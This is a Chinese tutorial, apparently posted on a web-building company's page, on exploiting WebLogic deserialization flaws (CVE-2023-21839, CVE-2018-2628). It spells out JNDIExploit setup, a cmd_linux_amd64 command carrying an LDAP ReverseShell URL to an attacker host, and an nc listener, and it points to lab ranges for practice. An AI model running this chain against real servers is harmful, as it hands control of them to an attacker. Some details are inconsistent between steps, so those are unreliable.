☰
WebLogic 远程代码执行漏洞
2026/10/2 6:57:16 网站建设 项目流程

阶段

关键工具/命令

作用

1. 攻击机启动服务

java -jar JNDIExploit-1.3-SNAPSHOT.jar -i 192.168.230.16

启动恶意 LDAP 和 HTTP 服务器,用于响应靶机的请求并传递恶意类。

2. 发起攻击

./cmd_linux_amd64 -ip 10.3.4.123 -ldap ldap://192.168.230.16:1389/...

向靶机发送特制的 T3 协议数据,触发漏洞去连接攻击机的 LDAP 服务器。

3. 接收反弹 Shell

nc -l 35460

在攻击机上等待靶机执行恶意代码后,主动连接回该端口,从而获得目标服务器的控制权。

🛠️ 具体操作过程(都是在攻击机上操作)

可以按照下图的流程来理解这个攻击链:

  1. 准备恶意服务:在攻击机上运行JNDIExploit-1.4-SNAPSHOT.jar,它会同时开启一个 LDAP 服务器和一个 HTTP 服务器。LDAP 服务器负责响应靶机的连接,并告诉它去 HTTP 服务器下载一个恶意的 Java 类文件。
java -jar JNDIExploit-1.3-SNAPSHOT.jar -i 192.168.196.78
  1. 触发漏洞:攻击机执行cmd_linux_amd64工具(或使用 Python 脚本),它会向靶机的 端口 发送一个精心构造的 T3 协议数据包。由于靶机上的 WebLogic 存在反序列化漏洞,它会解析这个恶意数据包,并尝试连接攻击机的 LDAP 服务。
./cmd_linux_amd64 -ip 10.3.4.117 -ldap ldap://192.168.196.78:1389/Basic/ReverseShell/192.168.196.78/4444
  1. 执行恶意代码:当靶机连接到恶意 LDAP 服务器后,LDAP 服务器会返回一个引用地址,引导靶机去下载并执行 HTTP 服务器上的恶意 Java 类。这个类会在靶机上执行预设的命令(例如反弹 Shell),并尝试连接回攻击机的 4444端口。
  2. 监听获取控制权:在攻击机上使用nc -l 4444开启监听,等待靶机连接。当靶机成功执行恶意类并回连后,攻击机就能获得一个交互式的 Shell,意味着已经成功控制了靶机。
nc -lvnp 4444

⚠️ 核心原理补充

  • T3 协议:这是 WebLogic 特有的通信协议,默认在 7001 端口开启,用于客户端和服务器之间的数据传输。
  • 反序列化漏洞:本质上是因为 WebLogic 在通过 T3 协议接收数据时,没有对反序列化的内容进行严格过滤,攻击者可以利用反序列化过程执行恶意代码。

总结

攻击 WebLogic 的过程,简单说就是:利用目标默认开启的T3协议漏洞,在攻击机上架设一个“恶意仓库”,诱导目标服务器访问并下载恶意代码,最终获得服务器控制权。这条针对CVE-2023-21839(或 CVE-2018-2628)的完整路径,主要利用JNDI 注入来实现远程代码执行。

🛠️ 攻击步骤核心拆解

整个流程和你刚才操作的一致,分为以下几步:

攻击流程

主要操作

技术原理

1. 搭建恶意“仓库”

在攻击机启动JNDIExploit

,开启 LDAP 和 HTTP 服务

利用LDAP 服务来响应目标的请求,引导它去指定的HTTP 服务下载恶意 Java 类

2. 诱导目标访问

向目标的7001

端口发送 T3 协议数据包

数据包触发目标程序进行JNDI Lookup(远程查找),导致目标主动连接攻击机

3. 获取反弹 Shell

在攻击机使用nc

监听端口,接收连接

目标下载恶意代码并执行后,会按预设指令主动回连到攻击机的监听端口

🔍 漏洞原理说明

这两个漏洞的成因都源于 WebLogic 的T3 协议(默认开放 7001 端口)和Java 反序列化机制。

  • 反序列化机制:WebLogic 为进行内部通信,会处理来自网络的序列化数据。如果接收到的数据是不受信任的恶意构造,就可能在服务器上触发意外的代码执行。
  • JNDI 注入:这是 CVE-2023-21839 的核心。攻击者通过漏洞让服务器去查找一个由攻击者控制的远程对象(如通过 LDAP 协议)。当服务器“查字典”找到这个恶意对象时,就会去下载并运行攻击者准备好的恶意代码,从而完成入侵。

📊 适用攻击范围

针对不同漏洞版本,其影响范围有所不同:

  • CVE-2018-2628:影响10.3.6.0、12.1.3.0、12.2.1.2、12.2.1.3等版本。
  • CVE-2023-21839:影响12.2.1.3.0、12.2.1.4.0、14.1.1.0.0等版本。由于该漏洞利用时不需要身份验证,且能被网络访问利用,其威胁等级被评定为7.5 (高危)。

💻 推荐靶场练习

你可以通过以下途径搭建环境进行练习:

  1. 本地 Docker 环境(推荐):下载Vulhub项目,在对应目录下执行docker-compose up -d即可启动包含漏洞的 WebLogic 环境。
  2. 在线靶场:可以尝试 vulfocus.cn 或 buuoj.cn 等在线靶场平台,通常会有预置好的 WebLogic 漏洞环境供直接练习。

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询